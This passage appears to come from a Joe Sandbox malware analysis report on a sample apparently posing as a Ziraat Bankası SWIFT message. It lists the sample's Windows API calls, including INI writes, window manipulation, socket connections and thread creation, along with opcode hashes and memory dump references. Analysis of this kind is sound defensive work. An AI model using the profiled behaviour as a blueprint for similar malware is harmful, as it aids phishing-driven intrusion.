                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessageSend$ButtonCheckedLongWindow
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3188977179-0
                                                                                                                                                        • Opcode ID: 3562bc4520bae32ef96addfaf982bf6f837b5739b97301a7dde54a2828d01e6e
                                                                                                                                                        • Instruction ID: 76f30b00e5065d4550592528bee10e44f81bdb2306bb22d8dc7b58c629481af4
                                                                                                                                                        • Opcode Fuzzy Hash: 3562bc4520bae32ef96addfaf982bf6f837b5739b97301a7dde54a2828d01e6e
                                                                                                                                                        • Instruction Fuzzy Hash: C661AF34A002C8AFDB25DF59CC94FEA77FAAB49300F144099F959A72A1C7B1A9C0CB11
                                                                                                                                                        APIs
                                                                                                                                                        • VariantInit.OLEAUT32(?), ref: 000C1CB4
                                                                                                                                                        • VariantClear.OLEAUT32(00000013), ref: 000C1D26
                                                                                                                                                        • VariantClear.OLEAUT32(00000000), ref: 000C1D81
                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 000C1DF8
                                                                                                                                                        • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 000C1E26
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Variant$Clear$ChangeInitType
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 4136290138-0
                                                                                                                                                        • Opcode ID: b756f3cc22f807f7534b2b7383d67071e81d60dd7e3b9f643185e4a7972ce667
                                                                                                                                                        • Instruction ID: c03d7e7490fa75119ca5b989568870d15f445f9a9b7d7b40999e0f7554bf7fdf
                                                                                                                                                        • Opcode Fuzzy Hash: b756f3cc22f807f7534b2b7383d67071e81d60dd7e3b9f643185e4a7972ce667
                                                                                                                                                        • Instruction Fuzzy Hash: 5C5147B5A00209EFDB14CF58D880EAAB7F8FF4D314B158559E95ADB301E730EA51CBA0
                                                                                                                                                        APIs
                                                                                                                                                        • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 000CA806
                                                                                                                                                        • SafeArrayAccessData.OLEAUT32(?,?), ref: 000CA831
                                                                                                                                                        • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 000CA858
                                                                                                                                                        • SafeArrayAccessData.OLEAUT32(?,?), ref: 000CA895
                                                                                                                                                        • SafeArrayUnaccessData.OLEAUT32(?), ref: 000CAAB7
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ArraySafe$Data$AccessUnaccess$Vartype
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1349711609-0
                                                                                                                                                        • Opcode ID: 9bfcaa4d02643e6089d88388780d323247f7b51e70c60f9e632539f3210f0676
                                                                                                                                                        • Instruction ID: 32359d827012c060e239a2e14f18d00ed15a9a01a2d25232b3b6427da603f2c4
                                                                                                                                                        • Opcode Fuzzy Hash: 9bfcaa4d02643e6089d88388780d323247f7b51e70c60f9e632539f3210f0676
                                                                                                                                                        • Instruction Fuzzy Hash: 3951BD71A002199FDB10CF94D885BEEB7F0FF0A328F20842DE545E7241C7349A85CBA2
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 04176343738f533950559c13c3af0d0e63d8e6adf8f098babd250f1cc60c3a4e
                                                                                                                                                        • Instruction ID: f248a7a50f73bd6c8d680cfbcf22dd063ff75b1b0e8108d053a4fad5bf519c9c
                                                                                                                                                        • Opcode Fuzzy Hash: 04176343738f533950559c13c3af0d0e63d8e6adf8f098babd250f1cc60c3a4e
                                                                                                                                                        • Instruction Fuzzy Hash: 0D412839904284BFE764DF69CC44FA97FA9FB09310F150125F859B72E1C772AD42C650
                                                                                                                                                        APIs
                                                                                                                                                        • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 000D12B4
                                                                                                                                                        • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 000D12DD
                                                                                                                                                        • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 000D131C
                                                                                                                                                          • Part of subcall function 0008936C: __swprintf.LIBCMT ref: 000893AB
                                                                                                                                                          • Part of subcall function 0008936C: __itow.LIBCMT ref: 000893DF
                                                                                                                                                        • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 000D1341
                                                                                                                                                        • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 000D1349
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1389676194-0
                                                                                                                                                        • Opcode ID: a95431c5becaf00ab5690f4e8ec37ea1aa9f24ab53b5363791406f4e88af5103
                                                                                                                                                        • Instruction ID: 4727a2b1875c027a07382ddc6bbcf338aba22a57ea4d5a308aa55a916cbb8b01
                                                                                                                                                        • Opcode Fuzzy Hash: a95431c5becaf00ab5690f4e8ec37ea1aa9f24ab53b5363791406f4e88af5103
                                                                                                                                                        • Instruction Fuzzy Hash: 53411F35600605EFDF01EF64C9819ADBBF5FF08314B148099E946AB362DB31EE41DB51
                                                                                                                                                        APIs
                                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 000BB369
                                                                                                                                                        • PostMessageW.USER32(?,00000201,00000001), ref: 000BB413
                                                                                                                                                        • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 000BB41B
                                                                                                                                                        • PostMessageW.USER32(?,00000202,00000000), ref: 000BB429
                                                                                                                                                        • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 000BB431
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessagePostSleep$RectWindow
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3382505437-0
                                                                                                                                                        • Opcode ID: cb648fbd6d4aa1adc8862aac7e798c38d6dd604b8272889d7921b38d5d84ac41
                                                                                                                                                        • Instruction ID: 1ab12f1580632eef55f530a4cff87f64e3b5a5905bc1e4849df5c26e82a480ec
                                                                                                                                                        • Opcode Fuzzy Hash: cb648fbd6d4aa1adc8862aac7e798c38d6dd604b8272889d7921b38d5d84ac41
                                                                                                                                                        • Instruction Fuzzy Hash: 2E31BA71900219EBDB14CFA8D94DADE3BB5FB04719F104229F961AB2D1C7F09A54CB90
                                                                                                                                                        APIs
                                                                                                                                                        • IsWindowVisible.USER32(?), ref: 000BDBD7
                                                                                                                                                        • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 000BDBF4
                                                                                                                                                        • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 000BDC2C
                                                                                                                                                        • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 000BDC52
                                                                                                                                                        • _wcsstr.LIBCMT ref: 000BDC5C
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3902887630-0
                                                                                                                                                        • Opcode ID: a817045fd417a9e4d3704d26262936b1290aeec27be40acfc0182cfd5bd82efa
                                                                                                                                                        • Instruction ID: c54d50c8f187e353ad19707740e62b55b0332336676f6ae5e6f933bc7bebea5b
                                                                                                                                                        • Opcode Fuzzy Hash: a817045fd417a9e4d3704d26262936b1290aeec27be40acfc0182cfd5bd82efa
                                                                                                                                                        • Instruction Fuzzy Hash: 5521F971204105BBEB255F79AC49EFFBFA8EF45760F10803AF909CA191FAA1DC41E660
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 0009B34E: GetWindowLongW.USER32(?,000000EB), ref: 0009B35F
                                                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 000EDEB0
                                                                                                                                                        • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 000EDED4
                                                                                                                                                        • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 000EDEEC
                                                                                                                                                        • GetSystemMetrics.USER32(00000004), ref: 000EDF14
                                                                                                                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,00000000,?,000D3A1E,00000000), ref: 000EDF32
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Window$Long$MetricsSystem
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2294984445-0
                                                                                                                                                        • Opcode ID: 071c71513ae153c0624c9636f30a1c2f89307f9000fca08e5f4a6ff570e6e165
                                                                                                                                                        • Instruction ID: 786aa48ec10be496a41f9ac6f35ca94d3936b206915c4507e3780a8b05a668fb
                                                                                                                                                        • Opcode Fuzzy Hash: 071c71513ae153c0624c9636f30a1c2f89307f9000fca08e5f4a6ff570e6e165
                                                                                                                                                        • Instruction Fuzzy Hash: 0921B071611252AFCB209F7ADC48B6A37E5EB15324F150336F966EAAF0D77098908B80
                                                                                                                                                        APIs
                                                                                                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 000BBC90
                                                                                                                                                        • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 000BBCC2
                                                                                                                                                        • __itow.LIBCMT ref: 000BBCDA
                                                                                                                                                        • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 000BBD00
                                                                                                                                                        • __itow.LIBCMT ref: 000BBD11
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessageSend$__itow
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3379773720-0
                                                                                                                                                        • Opcode ID: 518f76e6da72c5e1bda460ca9f73cff451d3983bba483e6d8ef72f21f682cdfd
                                                                                                                                                        • Instruction ID: 97568eb477291c9f8e0ba4804309ae055d7991c0c6c44b67b56e68997ee9e17d
                                                                                                                                                        • Opcode Fuzzy Hash: 518f76e6da72c5e1bda460ca9f73cff451d3983bba483e6d8ef72f21f682cdfd
                                                                                                                                                        • Instruction Fuzzy Hash: DA21C335600618BFDB20AAA59C46FDE7EA9AF5A710F000424FA45EB182EBF5C94587A1
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 000850E6: _wcsncpy.LIBCMT ref: 000850FA
                                                                                                                                                        • GetFileAttributesW.KERNEL32(?,?,?,?,000C60C3), ref: 000C6369
                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,000C60C3), ref: 000C6374
                                                                                                                                                        • CreateDirectoryW.KERNEL32(?,00000000,?,?,?,000C60C3), ref: 000C6388
                                                                                                                                                        • _wcsrchr.LIBCMT ref: 000C63AA
                                                                                                                                                          • Part of subcall function 000C6318: CreateDirectoryW.KERNEL32(?,00000000,?,?,?,000C60C3), ref: 000C63E0
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3633006590-0
                                                                                                                                                        • Opcode ID: a23cc21a34a45d445fd906c52d280d2c6f7f745035304cbf70260ea68d36f236
                                                                                                                                                        • Instruction ID: 203bcf183af5212b22dea68d978e6933560bd28f31c1e4e368574d12ca157e05
                                                                                                                                                        • Opcode Fuzzy Hash: a23cc21a34a45d445fd906c52d280d2c6f7f745035304cbf70260ea68d36f236
                                                                                                                                                        • Instruction Fuzzy Hash: D521D8319042555BEF35ABB8AC42FEE23ACAF06360F10046DF145D70C2EBA2DA809A65
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 000DA82C: inet_addr.WSOCK32(00000000), ref: 000DA84E
                                                                                                                                                        • socket.WSOCK32(00000002,00000001,00000006), ref: 000D8BD3
                                                                                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 000D8BE2
                                                                                                                                                        • connect.WSOCK32(00000000,?,00000010), ref: 000D8BFE
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ErrorLastconnectinet_addrsocket
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3701255441-0
                                                                                                                                                        • Opcode ID: cf2fe46536ddd901613e9933655244f2b9f1da92569297fe52a3962dccdc46d2
                                                                                                                                                        • Instruction ID: eb7bbb0934b2fcd90c0a7fe34c61f70585c48c74170393e2b787a330398d1ff5
                                                                                                                                                        • Opcode Fuzzy Hash: cf2fe46536ddd901613e9933655244f2b9f1da92569297fe52a3962dccdc46d2
                                                                                                                                                        • Instruction Fuzzy Hash: 792181712002149FDB14AF68DC45FBE77A9EF48714F04845AF95697392CBB4E8418761
                                                                                                                                                        APIs
                                                                                                                                                        • IsWindow.USER32(00000000), ref: 000D8441
                                                                                                                                                        • GetForegroundWindow.USER32 ref: 000D8458
                                                                                                                                                        • GetDC.USER32(00000000), ref: 000D8494
                                                                                                                                                        • GetPixel.GDI32(00000000,?,00000003), ref: 000D84A0
                                                                                                                                                        • ReleaseDC.USER32(00000000,00000003), ref: 000D84DB
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Window$ForegroundPixelRelease
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 4156661090-0
                                                                                                                                                        • Opcode ID: 3462794206e6e5400e6c57d1b5f94fea569775e193df337ab8be70a6beebeb6d
                                                                                                                                                        • Instruction ID: ba928a16fc51537368ef245d0d8e23b8be226687aee6f5f9c0d4f20362d3194c
                                                                                                                                                        • Opcode Fuzzy Hash: 3462794206e6e5400e6c57d1b5f94fea569775e193df337ab8be70a6beebeb6d
                                                                                                                                                        • Instruction Fuzzy Hash: C8218175A00204AFD700EFA4D889AAEBBF5EF48301F04C479E85997752DF70AC40DB60
                                                                                                                                                        APIs
                                                                                                                                                        • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0009AFE3
                                                                                                                                                        • SelectObject.GDI32(?,00000000), ref: 0009AFF2
                                                                                                                                                        • BeginPath.GDI32(?), ref: 0009B009
                                                                                                                                                        • SelectObject.GDI32(?,00000000), ref: 0009B033
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ObjectSelect$BeginCreatePath
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3225163088-0
                                                                                                                                                        • Opcode ID: 7e9fbd1ed7bd13943a247a69b7a96db6db9d60a2b0ed8d3567f4a20b57c0a0cb
                                                                                                                                                        • Instruction ID: 3d046bf7c7d1673344963281cfea9a3a5c78c3ef06b68763a72e75d3cd649d3b
                                                                                                                                                        • Opcode Fuzzy Hash: 7e9fbd1ed7bd13943a247a69b7a96db6db9d60a2b0ed8d3567f4a20b57c0a0cb
                                                                                                                                                        • Instruction Fuzzy Hash: E02190B4900309BFDB209F95ED487AA7BA8B712365F15422AF524924B0D3F088C1EB90
                                                                                                                                                        APIs
                                                                                                                                                        • __calloc_crt.LIBCMT ref: 000A21A9
                                                                                                                                                        • CreateThread.KERNEL32(?,?,000A22DF,00000000,?,?), ref: 000A21ED
                                                                                                                                                        • GetLastError.KERNEL32 ref: 000A21F7
                                                                                                                                                        • _free.LIBCMT ref: 000A2200
                                                                                                                                                        • __dosmaperr.LIBCMT ref: 000A220B
                                                                                                                                                          • Part of subcall function 000A7C0E: __getptd_noexit.LIBCMT ref: 000A7C0E
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2664167353-0
                                                                                                                                                        • Opcode ID: c060fac9acc539f4d5070322234d35221bfee5c35fb8c88f2a13823f9aa49251
                                                                                                                                                        • Instruction ID: 69cc50b1a34448f0b0b19423ce35555faf808d1fd498ba3e1139c8dc8460360e
                                                                                                                                                        • Opcode Fuzzy Hash: c060fac9acc539f4d5070322234d35221bfee5c35fb8c88f2a13823f9aa49251
                                                                                                                                                        • Instruction Fuzzy Hash: 7111C832104306AFDB21AFE9EC41EDB3BE8EF57770B104539F91886152DB71D85187A1
                                                                                                                                                        APIs
                                                                                                                                                        • GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 000BABD7
                                                                                                                                                        • GetLastError.KERNEL32(?,000BA69F,?,?,?), ref: 000BABE1
                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,000BA69F,?,?,?), ref: 000BABF0
                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,000BA69F,?,?,?), ref: 000BABF7
                                                                                                                                                        • GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 000BAC0E
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
